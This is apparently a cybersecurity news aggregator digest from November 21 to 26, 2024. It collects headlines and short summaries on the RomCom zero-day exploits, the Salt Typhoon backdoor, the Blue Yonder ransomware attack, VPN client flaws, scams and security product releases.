    Autosummary: Schubring Global Solutions | USA | On-site – View job details As a Cybersecurity Engineer (RMF/ATO), you will conduct cybersecurity hardening activities (system patching, updating (applications, OSs, firmware, antivirus, etc.), applying Secure Technical Implementation Guides (STIGs) and Security Requirements Guides (SRGs), and any other secure configuration requirements. Industrial Security Officer Helsing | Germany | On-site – View job details As an Industrial Security Officer, you will lead the design, deployment, and operation of advanced security systems, including intruder alerts, CCTV, and access control systems, in compliance with German national and NATO security standards for one of our sites. SOC/SIRT Engineer Datavant | USA | Remote – View job details As a SOC/SIRT Engineer, you will design, mature, and implement advanced playbooks for triage, investigation, and response to cyber threats, with a focus on continuous improvement and automation.Implement and manage standard AWS security tools including but not limited to AWS Security Hub, AWS GuardDuty, Inspector, CloudTrail, WAF, KMS, Config, IAM Access Analyzer. "


    Practical strategies to build an inclusive culture in cybersecurity

    ciber
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/alona-geckler-acronis-cybersecurity-diversity/

    In this Help Net Security interview, Alona Geckler, Chief of Staff, SVP of Business Operations at Acronis, shares her insights on the diversity environment in the cybersecurity and IT industries. She discusses the progress made over the past two decades, initiatives to foster inclusivity, and the remaining challenges. Geckler addresses unconscious bias and barriers to career advancement, offering practical strategies for organizations to foster more inclusive environments. How has the industry evolved in terms of … More

    The post Practical strategies to build an inclusive culture in cybersecurity appeared first on Help Net Security.

    "

    Autosummary: At Acronis, we’ve embraced this evolution with yearly mentorship programs, Women in Tech (WiT) Chapters across different regions, and initiatives like our WiT Cyberbreakfasts, which we’ve launched in Switzerland, Brazil, Singapore, Serbia, and Israel, with plans to expand into other countries. For instance, our Women in Tech (WiT) programs and panels at industry events, our mentorship programs, and conducting our own research, such as the Fear of Missing Out survey, for example, all reflect our commitment to celebrating and increasing diversity. Years ago, structured opportunities for women and minorities were limited and uncoordinated, but today there are numerous initiatives, including mentorship programs, scholarships, and coding boot camps, that specifically support these groups. Establishing supportive Employee Resource Groups, such as Acronis’ Voices of Employees, as an example — a working group where representatives from various departments launch initiatives to help employees unite, connect, and build stronger networks — can create a valuable space for dialogue and peer support. "


    Firefox and Windows zero-days exploited by Russian RomCom hackers

    exploits rusia-ucrania
    2024-11-26 https://www.bleepingcomputer.com/news/security/firefox-and-windows-zero-days-exploited-by-russian-romcom-hackers/
    Russian-based RomCom cybercrime group chained two zero-day vulnerabilities in recent attacks targeting Firefox and Tor Browser users across Europe and North America. [...] "

    Autosummary: While investigating this campaign, ESET found that the Russian threat actors focused their attacks on organizations in Ukraine, Europe, and North America from various industries affected, including government, defense, energy, pharmaceuticals, and insurance. "


    RomCom hackers chained Firefox and Windows zero-days to deliver backdoor

    exploits
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/romcom-backdoor-cve-2024-9680-cve-2024-49039/

    Russia-aligned APT group RomCom was behind attacks that leveraged CVE-2024-9680, a remote code execution flaw in Firefox, and CVE-2024-49039, an elevation of privilege vulnerability in Windows Task Scheduler, as zero-days earlier this year. “Chaining together two zero-day vulnerabilities armed RomCom with an exploit that requires no user interaction,” ESET researchers said. The campaign leveraging the zero-click exploit CVE-2024-9680 allowed the attackers to execute code in the restricted context of the browser and CVE-2024-49039 allowed it … More

    The post RomCom hackers chained Firefox and Windows zero-days to deliver backdoor appeared first on Help Net Security.

    "

    Autosummary: “According to our telemetry, from October 10, 2024 to November 4th, 2024, potential victims who visited websites hosting the exploit were located mainly in Europe and North America,” ESET shared, and noted that the campaign seems to have been widespread. "


    Why Cybersecurity Leaders Trust the MITRE ATT&CK Evaluations

    ciber
    2024-11-26 https://www.bleepingcomputer.com/news/security/why-cybersecurity-leaders-trust-the-mitre-attack-evaluations/
    The "MITRE Engenuity ATT&CK Evaluations: Enterprise" stand out as an essential resource for cybersecurity decision makers. Learn more from Cynet on what to expect in the upcoming 2024 MITRE ATT&CK Evaluation results. [...] "

    Autosummary: Several key factors set MITRE ATT&CK Evaluations apart from other independent analyst assessments, making them particularly valuable for security leaders: Real-World Conditions: Unlike other assessments, MITRE ATT&CK Evaluations are based on simulated TTPs by specific threat actors. "


    Hackers exploit critical bug in Array Networks SSL VPN products

    exploits
    2024-11-26 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-bug-in-array-networks-ssl-vpn-products/
    America"s cyber defense agency has received evidence of hackers actively exploiting a remote code execution vulnerability in SSL VPN products Array Networks AG and vxAG ArrayOS. [...] "

    Autosummary: "


    Researchers reveal exploitable flaws in corporate VPN clients

    exploits
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/vulnerabilities-corporate-vpn-clients-cve-2024-5921-cve-2024-29014/

    Researchers have discovered vulnerabilities in the update process of Palo Alto Networks (CVE-2024-5921) and SonicWall (CVE-2024-29014) corporate VPN clients that could be exploited to remotely execute code on users’ devices. CVE-2024-5921 CVE-2024-5921 affects various versions of Palo Alto’s GlobalProtect App on Windows, macOS and Linux, and stems from insufficient certification validation. It enables attackers to connect the GlobalProtect app to arbitrary servers, the company confirmed, and noted that this may result in attackers installing malicious … More

    The post Researchers reveal exploitable flaws in corporate VPN clients appeared first on Help Net Security.

    "

    Autosummary: “If an immediate upgrade is not feasible, consider using a client firewall to restrict access to known, legitimate VPN endpoints to prevent users from inadvertently connecting to malicious servers,” AmberWolf advised. "


    Starbucks, grocery stores impacted by Blue Yonder ransomware attack

    exploits ransomware
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/starbucks-blue-yonder-ransomware-attack/

    Supply chain management SaaS vendor Blue Yonder announced on November 21 that it experienced a ransomware attack that impacted its managed services hosted environment. “Since learning of the incident, the Blue Yonder team has been working diligently together with external cybersecurity firms to make progress in their recovery process. We have implemented several defensive and forensic protocols,” the company said. “With respect to the Blue Yonder Azure public cloud environment, we are actively monitoring and … More

    The post Starbucks, grocery stores impacted by Blue Yonder ransomware attack appeared first on Help Net Security.

    "

    Autosummary: "


    Commvault Clumio Backtrack helps recover data from errors, accidents, or cyberattacks

    ciber
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/commvault-clumio-backtrack/

    Commvault announced Clumio Backtrack, a new capability that will enable enterprises to use automation to rapidly revert objects – or pieces of data – stored in Amazon Simple Storage Service (Amazon S3) to a specific version at a specific point and time. This makes it quick and easy for cloud operations, IT, and security teams to recover data from errors, accidents, or cyberattacks, almost as if they were able to turn back the clock to … More

    The post Commvault Clumio Backtrack helps recover data from errors, accidents, or cyberattacks appeared first on Help Net Security.

    "

    Autosummary: “With the increasing complexity of enterprise data environments, businesses need fast, scalable, and secure data recovery solutions for the cloud-first world,” said Woon Jung, CTO – Cloud Native, Commvault. "


    Intruder Launches Intel: A Free Vulnerability Intelligence Platform For Staying Ahead of the Latest Threats

    exploits
    2024-11-26 https://thehackernews.com/2024/11/intruder-launches-intel-free.html
    When CVEs go viral, separating critical vulnerabilities from the noise is essential to protecting your organization. That’s why Intruder, a leader in attack surface management, built Intel - a free vulnerability intelligence platform designed to help you act fast and prioritize real threats. What is Intel? Intel was created to fill a gap in the resources available for tracking emerging "

    Autosummary: Centralized CVE insights: Intel streamlines your research by providing the latest information in one place, including risk scores, known exploits, and more. "


    RomCom Exploits Zero-Day Firefox and Windows Flaws in Sophisticated Cyberattacks

    exploits ciber
    2024-11-26 https://thehackernews.com/2024/11/romcom-exploits-zero-day-firefox-and.html
    The Russia-aligned threat actor known as RomCom has been linked to the zero-day exploitation of two security flaws, one in Mozilla Firefox and the other in Microsoft Windows, as part of attacks designed to deliver the eponymous backdoor on victim systems. "In a successful attack, if a victim browses a web page containing the exploit, an adversary can run arbitrary code – without any user

    Autosummary: A privilege escalation vulnerability in Windows Task Scheduler (patched by Microsoft in November 2024). RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has a track record of conducting both cybercrime and espionage operations since at least 2022.


    Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries

    exploits Telcos
    2024-11-26 https://thehackernews.com/2024/11/chinese-hackers-use-ghostspider-malware.html
    The China-linked threat actor known as Earth Estries has been observed using a previously undocumented backdoor called GHOSTSPIDER as part of its attacks targeting Southeast Asian telecommunications companies. Trend Micro, which described the hacking group as an aggressive advanced persistent threat (APT), said the intrusions also involved the use of another cross-platform backdoor dubbed

    Autosummary: Victims have been identified across over a dozen countries, including Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, the U.S., and Vietnam.


    Get 50% off Malwarebytes during Black Friday 2024

    exploits
    2024-11-26 https://www.bleepingcomputer.com/news/security/get-50-percent-off-malwarebytes-during-black-friday-2024/
    Malwarebytes' Black Friday 2024 deals are now live, offering a 50% discount on one- and two-year personal, family, and business subscriptions to its standalone anti-malware software, VPN, and Personal Data Remover services. [...]

    Autosummary: Malwarebytes includes the following features: advanced antivirus, anti-malware, anti-spyware, and more; phishing and malicious link protection; ransomware and zero-day exploit protection; scam protection; brute force protection; uninstall protection; and removal not only of malware but of adware and potentially unwanted programs as well.


    Software firm Blue Yonder providing services to US and UK stores, including Starbucks, hit by ransomware attack

    exploits ransomware
    2024-11-26 https://securityaffairs.com/171434/uncategorized/blue-yonder-ransomware-attack.html
    Blue Yonder, a supply chain software provider, suffered a ransomware attack, impacting operations for clients like Starbucks and grocery stores. A ransomware attack on Blue Yonder disrupted operations for several customers, including Starbucks and U.K. grocery chain Sainsbury. “A ransomware attack has disrupted a third-party software system that Starbucks uses to track and manage its baristas’ schedules, […]

    Autosummary: Pierluigi Paganini, November 26, 2024: Blue Yonder, a supply chain software provider, suffered a ransomware attack, impacting operations for clients like Starbucks and grocery stores.


    AI Kuru, cybersecurity and quantum computing

    ciber
    2024-11-25 https://www.helpnetsecurity.com/2024/11/25/ai-quantum-computers/

    As we continue to delegate more infrastructure operations to artificial intelligence (AI), quantum computers are advancing towards Q-day (i.e., the day when quantum computers can break current encryption methods). This could compromise the security of digital communications, as well as autonomous control systems that use AI and ML to make decisions. As AI and quantum converge to reveal extraordinary novel technologies, they will also combine to produce new threat vectors and quantum cryptanalysis. AI and … More

    The post AI Kuru, cybersecurity and quantum computing appeared first on Help Net Security.


    Autosummary: AI-diagnosticians have described it as the symptoms of a chronic disease variously characterized as model-collapse, MADness, etc., where AI’s primary source of nutrition was AI-generated junk food, euphemistically known as synthetic data. As we continue to delegate more infrastructure operations to artificial intelligence (AI), quantum computers are advancing towards Q-day (i.e., the day when quantum computers can break current encryption methods).


    Deploy a SOC using Kali Linux in AWS

    Linux
    2024-11-25 https://www.helpnetsecurity.com/2024/11/25/kali-soc-aws/

    The Kali SOC in AWS project enables the deployment of a Security Operations Center (SOC) in AWS, utilizing the Kali Linux toolset for purple team activities. This environment is ideal for honing skills in security operations, threat detection, incident response, and training scenarios. About the Kali SOC project “I created this project to address the need for accessible and customizable detection and threat hunting labs. People often ask me for advice on building labs, and … More

    The post Deploy a SOC using Kali Linux in AWS appeared first on Help Net Security.


    Autosummary: Furthermore, the project is designed to give users complete control over their lab, making it adaptable for learning, experimentation, or operational use,” Payton explained.


    Wireshark 4.4.2: Security updates, bug fixes, updated protocol support

    exploits
    2024-11-25 https://www.helpnetsecurity.com/2024/11/25/wireshark-4-4-2-released/

    Wireshark, the popular network protocol analyzer, has reached version 4.4.2. It is used for troubleshooting, analysis, development and education. The following vulnerabilities have been fixed: wnpa-sec-2024-14, FiveCo RAP dissector infinite loop; wnpa-sec-2024-15, ECMP dissector crash. Updated protocol support: ARTNET, ASN.1 PER, BACapp, BT BR/EDR, CQL, DOF, ECMP, ENIP, FiveCo RAP, Frame, FTDI FT, HSRP, HTTP/2, ICMPv6, IEEE 802.11, MBTCP, MMS, MPEG PES, PN-DCP, POP, ProtoBuf, PTP, RPC, RTCP, SIP, SRT, Syslog, TCP, UMTS RLC, USB … More

    The post Wireshark 4.4.2: Security updates, bug fixes, updated protocol support appeared first on Help Net Security.


    Autosummary: Updated protocol support: ARTNET, ASN.1 PER, BACapp, BT BR/EDR, CQL, DOF, ECMP, ENIP, FiveCo RAP, Frame, FTDI FT, HSRP, HTTP/2, ICMPv6, IEEE 802.11, MBTCP, MMS, MPEG PES, PN-DCP, POP, ProtoBuf, PTP, RPC, RTCP, SIP, SRT, Syslog, TCP, UMTS RLC, USB CCID, Wi-SUN, and ZigBee ZCL. OSS-Fuzz 71476: wireshark:fuzzshark_ip_proto-udp: Index-out-of-bounds in DOFObjectID_Create_Unmarshal.


    Salt Typhoon hackers backdoor telcos with new GhostSpider malware

    exploits Telcos
    2024-11-25 https://www.bleepingcomputer.com/news/security/salt-typhoon-hackers-backdoor-telcos-with-new-ghostspider-malware/
    The Chinese state-sponsored hacking group Salt Typhoon has been observed utilizing a new "GhostSpider" backdoor in attacks against telecommunication service providers. [...]

    Autosummary: CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN); CVE-2023-48788 (Fortinet FortiClient EMS); CVE-2022-3236 (Sophos Firewall); CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon). Salt Typhoon uses LOLbin tools for intelligence gathering and lateral network movement in the post-compromise phase. According to Trend Micro, Salt Typhoon has attacked telecommunications, government entities, technology, consulting, chemicals, and transportation sectors in the U.S., Asia-Pacific, Middle East, South Africa, and other regions. Attribution diagram (source: Trend Micro). Salt Typhoon's global campaigns: Salt Typhoon (aka "Earth Estries", "GhostEmperor", or "UNC2286") is a sophisticated hacking group that has been active since at least 2019 and typically focuses on breaching government entities and telecommunications companies.


    DOJ: Man hacked networks to pitch cybersecurity services

    ciber
    2024-11-25 https://www.bleepingcomputer.com/news/security/doj-man-hacked-networks-to-pitch-cybersecurity-services/
    A Kansas City man has been indicted for allegedly hacking into computer networks and using this access to promote his cybersecurity services. [...]

    Autosummary: According to the Department of Justice, Nicholas Michael Kloster, 31, of Kansas City, Missouri, breached two computer networks, a health club business and a nonprofit organization.


    FlipaClip animation app data breach exposes details of almost 900,000 users

    financial
    2024-11-25 https://www.bitdefender.com/en-us/blog/hotforsecurity/flipaclip-animation-app-data-breach-900-000-users
    Flipaclip, an animation creation app that is particularly popular with youngsters, has exposed the details of over 890,000 users. Read more in my article on the Hot for Security blog.

    Autosummary: However, names, dates of birth, email addresses, and countries of residence were breached, and it is easy to imagine how a fraudster could exploit such information (for instance, in a phishing campaign) to trick FlipaClip animators into handing over their login credentials and other sensitive information.


    Faraway Russian hackers breached US organization via Wi-Fi

    rusia-ucrania
    2024-11-25 https://www.helpnetsecurity.com/2024/11/25/enterprise-wi-fi-compromised/

    Forest Blizzard, a threat group associated with Russia’s GRU military intelligence service, repeatedly breached a US-based organization via compromised computer systems of nearby firms, which they leveraged to authenticate to the target’s enterprise Wi-Fi network. The repeated attacks: Volexity, a company that specializes in helping organizations detect the presence of and boot out nation-state level intruders from their systems and networks, said that the attackers were first spotted on a server on the target US … More

    The post Faraway Russian hackers breached US organization via Wi-Fi appeared first on Help Net Security.


    Autosummary: They solved the problem by: breaching a nearby organization’s system; moving laterally within that organization to find accessible systems that are connected to the network via a wired Ethernet connection and have a Wi-Fi adapter; and using that Wi-Fi adapter to connect to the target organization’s Wi-Fi and authenticate to it by using credentials they had previously compromised via password spraying.


    Blue Yonder ransomware attack disrupts grocery store supply chain

    exploits ransomware
    2024-11-25 https://www.bleepingcomputer.com/news/security/blue-yonder-ransomware-attack-disrupts-grocery-store-supply-chain/
    Supply chain management firm Blue Yonder is warning that a ransomware attack caused significant disruption to its services, with the outages impacting grocery store chains in the UK. [...]

    Autosummary: Among its 3,000 customers are high-profile organizations like DHL, Renault, Bayer, Morrisons, Nestle, 3M, Tesco, Starbucks, Ace Hardware, Procter & Gamble, Sainsbury, and 7-Eleven.


    THN Recap: Top Cybersecurity Threats, Tools, and Practices (Nov 18 - Nov 24)

    ciber
    2024-11-25 https://thehackernews.com/2024/11/thn-recap-top-cybersecurity-threats_25.html
    We hear terms like “state-sponsored attacks” and “critical vulnerabilities” all the time, but what’s really going on behind those words? This week’s cybersecurity news isn’t just about hackers and headlines—it’s about how digital risks shape our lives in ways we might not even realize. For instance, telecom networks being breached isn’t just about stolen data—it’s about power. Hackers are

    Autosummary: Trending CVEs: Recent cybersecurity developments have highlighted several critical vulnerabilities, including: CVE-2024-44308, CVE-2024-44309 (Apple), CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-11003, CVE-2024-10224 (needrestart), CVE-2024-51092 (LibreNMS), CVE-2024-10217, CVE-2024-10218 (TIBCO), CVE-2024-50306 (Apache Traffic Server), CVE-2024-10524 (wget), CVE-2024-34719 (Android), CVE-2024-9942 (WPGYM), CVE-2024-52034 (mySCADA myPRO), and CVE-2024-0138 (NVIDIA). The attacks primarily target vulnerable IoT devices from various vendors like NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO, using automated scripts in order to deploy the Ngioweb malware. The attacks, dubbed RoboPAIR, have been successfully demonstrated against "a self-driving LLM, a wheeled academic robot, and, most concerningly, the Unitree Go2 robot dog, which is actively deployed in war zones and by law enforcement," security researcher Alex Robey said. This development coincides with U.S. telecom providers, including AT&T, Verizon, T-Mobile, and Lumen Technologies, becoming targets of another China-linked hacking group, Salt Typhoon. Ptitsyn, who is alleged to be an administrator, has been charged in a 13-count indictment with wire fraud conspiracy, wire fraud, conspiracy to commit computer fraud and abuse, four counts of causing intentional damage to protected computers, and four counts of extortion in relation to hacking. With features like database and column detection, data length discovery, and multiple extraction methods (character-by-character, binary search, or dictionary attack), BlindBrute ensures efficient data retrieval. "The policy update, which compelled users to accept expanded data collection and sharing within the Meta group on a ‘take-it-or-leave-it’ basis, violated user autonomy by offering no opt-out option," the Internet Freedom Foundation (IFF) said. Millions of Data Records Exposed Due to Power Pages Misconfigurations: Missing or misconfigured access controls in websites built with Microsoft Power Pages are exposing private organizations' and government entities' sensitive data to outside parties, including full names, email addresses, phone numbers, and home addresses, leading to potential breaches.


    Cybersecurity Blind Spots in IaC and PaC Tools Expose Cloud Platforms to New Attacks

    ciber
    2024-11-25 https://thehackernews.com/2024/11/cybersecurity-flaws-in-iac-and-pac.html
    Cybersecurity researchers have disclosed two new attack techniques against infrastructure-as-code (IaC) and policy-as-code (PaC) tools like HashiCorp's Terraform and Styra's Open Policy Agent (OPA) that leverage dedicated, domain-specific languages (DSLs) to breach cloud platforms and exfiltrate data. "Since these are hardened languages with limited capabilities, they're supposed to be more

    Autosummary: Some of the other recommendations to mitigate such risks include: implement granular role-based access control (RBAC) and follow the principle of least privilege; set up application-level and cloud-level logging for monitoring and analysis; limit the network and data access of the applications and the underlying machines; and prevent automatic execution of unreviewed and potentially malicious code in CI/CD pipelines. Furthermore, organizations can use IaC scanning tools and solutions like Terrascan and Checkov to preemptively identify misconfigurations and compliance issues prior to deployment.


    Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections

    exploits
    2024-11-25 https://thehackernews.com/2024/11/researchers-uncover-malware-using-byovd.html
    Cybersecurity researchers have uncovered a new malicious campaign that leverages a technique called Bring Your Own Vulnerable Driver (BYOVD) to disarm security protections and ultimately gain access to the infected system. "This malware takes a more sinister route: it drops a legitimate Avast Anti-Rootkit driver (aswArPot.sys) and manipulates it to carry out its destructive agenda," Trellix



    Week in review: 0-days exploited in Palo Alto Networks firewalls, two unknown Linux backdoors identified

    exploits Linux
    2024-11-24 https://www.helpnetsecurity.com/2024/11/24/week-in-review-0-days-exploited-in-palo-alto-networks-firewalls-two-unknown-linux-backdoors-identified/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 2,000 Palo Alto Networks devices compromised in latest attacks: Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474), Shadowserver Foundation’s internet-wide scanning has revealed. Researchers unearth two previously unknown Linux backdoors: ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. ScubaGear: Open-source tool to … More

    The post Week in review: 0-days exploited in Palo Alto Networks firewalls, two unknown Linux backdoors identified appeared first on Help Net Security.


    Autosummary: New infosec products of the week: November 22, 2024: Here’s a look at the most interesting products from the past week, featuring releases from Aon, Arkose Labs, HiddenLayer, Hornetsecurity, Radware, and Tanium. Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308): Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”.


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 21

    exploits
    2024-11-24 https://securityaffairs.com/171337/malware/security-affairs-malware-newsletter-round-21.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Fake AI video generators infect Windows, macOS with infostealers; How Italy became an unexpected spyware hub; Babble Babble Babble Babble Babble Babble BabbleLoader; One Sock Fits All: The use and abuse of the NSOCKS botnet; Helldown […]



    Meta removes over 2 million accounts pushing pig butchering scams

    financial
    2024-11-24 https://www.bleepingcomputer.com/news/security/meta-removes-over-2-million-accounts-pushing-pig-butchering-scams/
    Meta announced that it has taken down 2 million accounts across its platforms since the beginning of the year that are linked to pig butchering and other scams. [...]

    Autosummary: What Meta is doing about it: Meta says it employs a range of measures to try to detect and stop these scams on its platforms, including Facebook, Instagram, WhatsApp, and Messenger, before they have the opportunity to bait users and victimize them.


    Bangkok busts SMS Blaster sending 1 million scam texts from a van

    financial
    2024-11-24 https://www.bleepingcomputer.com/news/security/bangkok-busts-sms-blaster-sending-1-million-scam-texts-from-a-van/
    The Thai police, working together with Thailand's largest telecommunications service provider, Advanced Info Service (AIS), located and busted the Chinese operators of an SMS blaster device that spammed fraudulent messages across Bangkok. [...]



    North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

    financial exploits
    2024-11-23 https://thehackernews.com/2024/11/north-korean-hackers-steal-10m-with-ai.html
    The North Korea-linked threat actor known as Sapphire Sleet is estimated to have stolen more than $10 million worth of cryptocurrency as part of social engineering campaigns orchestrated over a six-month period. These findings come from Microsoft, which said that multiple threat activity clusters with ties to the country have been observed creating fake profiles on LinkedIn, posing as both

    Autosummary: Redmond has also characterized North Korea's dispatching of thousands of IT workers abroad as a triple threat that makes money for the regime through "legitimate" work, allows them to abuse their access to get hold of intellectual property, and facilitates data theft in exchange for a ransom.


    China-linked APT Gelsemium uses a new Linux backdoor dubbed WolfsBane

    Linux
    2024-11-23 https://securityaffairs.com/171299/apt/china-linked-apt-gelsemium-linux-backdoor.html
    China-linked APT Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane in attacks targeting East and Southeast Asia. China-linked APT Gelsemium has deployed a previously unknown Linux backdoor, WolfsBane, in attacks targeting East and Southeast Asia, according to ESET. Victims include entities in Taiwan, the Philippines, and Singapore, as seen in VirusTotal samples from […]

    Autosummary: Pierluigi Paganini, November 23, 2024: China-linked APT Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane in attacks targeting East and Southeast Asia. “Consequently, threat actors are exploring new attack avenues, with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux.”


    Microsoft seized 240 sites used by the ONNX phishing service

    financial
    2024-11-23 https://securityaffairs.com/171287/cyber-crime/microsoft-disrupted-the-onnx-phishing-service.html
    Microsoft disrupted the ONNX phishing service, seizing 240 sites and naming an Egyptian man as the operator behind the operation. Microsoft announced the disruption of the ONNX phishing service, another success against cybercrime which led to the seizure of 240 sites. The IT giant also identified and publicly disclosed the identity of an Egyptian man, […]

    Autosummary: Pierluigi Paganini, November 23, 2024: Microsoft disrupted the ONNX phishing service, seizing 240 sites and naming an Egyptian man as the operator behind the operation.


    A cyberattack on gambling giant IGT disrupted portions of its IT systems

    ciber
    2024-11-23 https://securityaffairs.com/171311/hacking/cyberattack-on-gambling-giant-igt.html
    A cyberattack on gambling giant IGT disrupted its systems, forcing the company to take certain services offline. International Game Technology (IGT) detected a cyberattack on November 17, and the company promptly started its incident response procedures. International Game Technology PLC (IGT), formerly Gtech S.p.A. and Lottomatica S.p.A., is a multinational gambling company that produces slot machines […]



    Cybercriminals turn to pen testers to test ransomware efficiency

    exploits ransomware ciber
    2024-11-22 https://www.helpnetsecurity.com/2024/11/22/pen-testers-ransomware-recruiting/

    Ransomware gangs recruit pen testers to improve attack reliability: Threat actors are recruiting pen testers to test and improve the reliability of their ransomware for affiliate programs, according to Cato Networks. Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs. They want to ensure that their ransomware can be deployed successfully against organizations. … More

    The post Cybercriminals turn to pen testers to test ransomware efficiency appeared first on Help Net Security.


    Autosummary: Out of the hundreds of AI applications that Cato CTRL monitors, 10 AI applications were tracked and used by organizations (Bodygram, Craiyon, Otter.ai, Writesonic, Poe, HIX.AI, Fireflies.ai, PeekYou, Character.AI, and Luma AI), revealing various security risks.


    More than 2,000 Palo Alto Networks firewalls hacked exploiting recently patched zero-days

    exploits
    2024-11-22 https://securityaffairs.com/171268/hacking/palo-alto-networks-firewalls-hacked-zero-days.html
    Threat actors already hacked thousands of Palo Alto Networks firewalls exploiting recently patched zero-day vulnerabilities. Thousands of Palo Alto Networks firewalls have reportedly been compromised in attacks exploiting recently patched zero-day vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in PAN-OS. CVE-2024-0012 is a vulnerability in Palo Alto Networks PAN-OS that allows unauthenticated attackers with network access to the management […]

    Autosummary: The cybersecurity firm initially observed malicious activities originating from the following IP addresses: 136.144.17[.]*, 173.239.218[.]251, and 216.73.162[.]*. The advisory pointed out that these IP addresses may be associated with VPN services; for this reason, they are also associated with legitimate user activity.


    Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia

    exploits rusia-ucrania
    2024-11-22 https://thehackernews.com/2024/11/russian-hackers-deploy-hatvibe-and.html
    Threat actors with ties to Russia have been linked to a cyber espionage campaign aimed at organizations in Central Asia, East Asia, and Europe. Recorded Future's Insikt Group, which has assigned the activity cluster the name TAG-110, said it overlaps with a threat group tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) as UAC-0063, which, in turn, overlaps with APT28. The

    Autosummary: Russia is also believed to have ramped up its sabotage operations across European critical infrastructure following its full-scale invasion of Ukraine in February 2022, targeting Estonia, Finland, Latvia, Lithuania, Norway, and Poland with the goal of destabilizing NATO allies and disrupting their support for Ukraine.


    U.S. CISA adds Apple, Oracle Agile PLM bugs to its Known Exploited Vulnerabilities catalog

    exploits
    2024-11-22 https://securityaffairs.com/171282/security/u-s-cisa-adds-apple-oracle-agile-plm-bugs-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Oracle Agile PLM bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: This week, Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, […]

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-44308, Apple Multiple Products Code Execution Vulnerability; CVE-2024-44309, Apple Multiple Products Cross-Site Scripting (XSS) Vulnerability; CVE-2024-21287, Oracle Agile Product Lifecycle Management (PLM) Incorrect Authorization Vulnerability. This week, Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild.


    APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware

    exploits
    2024-11-22 https://thehackernews.com/2024/11/apt-k-47-uses-hajj-themed-lures-to.html
    The threat actor known as Mysterious Elephant has been observed using an advanced version of malware called Asynshell. The attack campaign is said to have used Hajj-themed lures to trick victims into executing a malicious payload under the guise of a Microsoft Compiled HTML Help (CHM) file, the Knownsec 404 team said in an analysis published today. Mysterious Elephant, which is also known as



    Windows 10 KB5046714 update fixes bug preventing app uninstalls

    exploits
    2024-11-22 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5046714-update-fixes-bug-preventing-app-uninstalls/
    Microsoft has released the optional KB5046714 Preview cumulative update for Windows 10 22H2 with six bug fixes, including a fix for a bug preventing users from uninstalling or updating packaged applications. [...]

    Autosummary: Windows 10 KB5046714 cumulative update preview (Source: BleepingComputer). After installing this update, Windows 10 22H2 will be updated to build 19045.5198.


    QNAP pulls buggy QTS firmware causing widespread NAS issues

    exploits
    2024-11-22 https://www.bleepingcomputer.com/news/technology/qnap-pulls-buggy-qts-firmware-causing-widespread-nas-issues/
    QNAP has pulled a recently released firmware update after widespread customer reports that it's breaking connectivity and, in some cases, locking users out of their devices. [...]



    Smashing Security podcast #394: Digital arrest scams and stream-jacking

    financial
    2024-11-21 https://grahamcluley.com/smashing-security-podcast-394/
    In our latest episode we discuss how a woman hid under the bed after scammers told her she was under "digital arrest", how hackers are hijacking YouTube channels through malicious sponsorship deals, and how one phone company is turning the tables on fraudsters through deepfake AI. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Maria Varmazis.

    Autosummary: Hosts: Graham Cluley (@grahamcluley.com), Carole Theriault (@caroletheriault). Guest: Maria Varmazis (@varmaz.is). Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device.


    Cyberattack at French hospital exposes health data of 750,000 patients

    ciber
    2024-11-21 https://www.bleepingcomputer.com/news/security/cyberattack-at-french-hospital-exposes-health-data-of-750-000-patients/
    A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...]

